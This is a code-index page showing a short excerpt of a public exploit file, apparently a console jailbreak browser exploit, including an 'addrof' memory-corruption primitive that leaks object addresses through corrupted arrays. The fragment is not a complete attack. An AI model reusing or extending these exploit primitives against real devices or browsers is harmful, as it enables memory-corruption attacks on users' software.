MCPcopy Create free account
hub / github.com/GamerHack/GamerHack.github.io / boot_addrof

Function boot_addrof

900v3/exploit.js:292–297  ·  view source on GitHub ↗
(obj)

Source from the content-addressed store, hash-verified

290print("arrays[257].length="+arrays[257].length);
291
292function boot_addrof(obj)
293{
294 arrays[257][32] = obj;
295 union_f[0] = arrays[258][0];
296 return union_i[1] * 0x100000000 + union_i[0];
297}
298
299function boot_fakeobj(addr)
300{

Callers 1

pocFunction · 0.70

Calls

no outgoing calls

Tested by

no test coverage detected